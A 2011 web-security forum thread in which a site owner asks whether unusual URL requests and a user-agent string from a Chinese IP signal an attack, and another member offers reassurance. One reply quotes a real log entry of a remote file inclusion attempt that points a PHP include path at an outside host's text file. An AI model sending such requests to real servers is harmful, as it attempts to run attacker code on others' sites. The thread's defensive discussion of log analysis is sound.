Possible hacking attempt ?

[STN]

Hello new member here,

I looked hard for correct section and it seems the right one so sorry if it isn't, just move to correct place.

I just need a little advice, recently i noticed an ip address accessing my ipb forums with this

?a64d431430d0bdcb041e2d7b6ac6aaf6=304d6a1e3de40e7a30fda93627bf4994

i.e site.com/the above link. It seems purposely accessed like that since IPB never generates a single link without index.php in it and also not in the way above. I checked the site access logs and found this
114.100.176.188 - - [03/Nov/2011:07:31:01 -0700] "GET / HTTP/1.1" 200 10176 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; @5j*{XEibbqraYz9j]3J2kQ^8n?EK1|Kqlq3,_; QQDownload 695; GTB7.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"

.NET CLR 3.5.30729 ? Seems like some sort of program is accessing this. The ip address is chinese. It is not accessing the url just once but access several times over the day, i haven't looked at the whole month log but i am guessing i'll find it there as well.

Banned the IP address already and there are none else accessing that url.

Please advise if what i am suspecting is true or it is normal.


PS: I am using whos.amung.us site widget which shows live visitors stats and what they are accessing. I only saw this just today.

[TechnoBear]

Hi, STN, and welcome to the forums.

I was hoping somebody more knowledgeable would have answered by now, but in the absence of anybody else, I'll offer an opinion. I've been truly paranoid since I had sites hacked, and I know the feeling of panic it engenders.

I checked the site access logs and found this
114.100.176.188 - - [03/Nov/2011:07:31:01 -0700] "GET / HTTP/1.1" 200 10176 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; @5j*{XEibbqraYz9j]3J2kQ^8n?EK1|Kqlq3,_; QQDownload 695; GTB7.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"

I'm not an expert, but that looks OK to me as a user-agent string. I couldn't find an exact match for it, but since you say the IP is Chinese, I'd guess it's IE8 with a Chinese add-on of some sort. Have a look at this site for some reassurance on how user-agent strings look.

I just need a little advice, recently i noticed an ip address accessing my ipb forums with this

?a64d431430d0bdcb041e2d7b6ac6aaf6=304d6a1e3de40e7a30fda93627bf4994

This I really don't know about.

From my very limited experience, a hacking attempt will show an IP accessing your site several times in the space of a couple of minutes, rather than at various times throughout the day, with something like:

Code:

188.72.237.24 - - [28/Oct/2011:03:22:11 +0100] "GET /guestbook.php//admin.php?include_path=http://magthai.com/images/config.txt?? HTTP/1.1" 403 553 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"

Hope that helps. With a bit of luck, somebody else will chip in here with more information.

[STN]

hey thanks for the reply.

I did more investigation and found that QQdownload is actually a chinese bittorrent client. http://en.wikipedia.org/wiki/QQdownload.

I banned the IP already since its better to be safe than sorry. My site has been hacked several times so i know the feeling, it does make you paranoid. One less user won't hurt me though.

I still believe it was a hacking attempt since normal users won't modify the url in such way. I have noticed how search engine bots act and majority of normal users and it is nothing like that. Also it just being chinese raises my suspicion meter since my site was hacked before by a chinese group. No offense meant to chinese people of course.

Cheers

[TechnoBear]

Yes, I understand that point of view. Two of my sites were hacked by (two different) Swedish IPs. One of those sites actually has a high proportion of foreign traffic - mainly Scandinavian, German, Dutch, Russian and Japanese. For a couple of months after the attack, I nearly had a fit any time an odd, foreign-language URL showed up anywhere in my stats and had to double-check everything. I hadn't realised until then quite how many (legitimate and relevant) incoming links we had from foreign-language sites, so that was one nice thing that came out of it. The other was that, in my search for more information, I found the SitePoint Forums.

[STN]

same here, i searched for web security forums and found this place. Been lurking around and there is nice info to be found, i think im gonna hang around for a while ^_^